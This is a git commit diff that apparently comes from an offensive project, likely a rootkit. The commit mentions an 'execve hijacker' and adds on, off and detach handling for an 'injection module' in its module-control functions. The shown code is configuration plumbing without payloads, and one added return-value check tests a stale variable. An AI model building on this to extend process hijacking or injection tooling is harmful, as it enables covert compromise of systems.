Updated some files for eveything to work now that it is all together. Execve hijacker and clients in particular

This commit is contained in:
h3xduck
2022-05-15 20:47:58 -04:00
parent 4a292f0f7a
commit 78b3132687
57 changed files with 15420 additions and 15487 deletions

View File

@@ -110,6 +110,9 @@ int activate_all_modules_config(){
//EXEC
module_config.exec_module.all = ON;
//INJECTION
module_config.injection_module.all = ON;
return 0;
}
@@ -126,6 +129,9 @@ int deactivate_all_modules_config(){
//EXEC
module_config.exec_module.all = OFF;
//INJECTION
module_config.injection_module.all = OFF;
return 0;
}
@@ -147,7 +153,11 @@ int unhook_all_modules(){
if(ret!=0) return -1;
//EXEC
detach_exec_all(attr.skel);
ret = detach_exec_all(attr.skel);
if(ret!=0) return -1;
//INJECTION
detach_injection_all(attr.skel);
if(ret!=0) return -1;
return 0;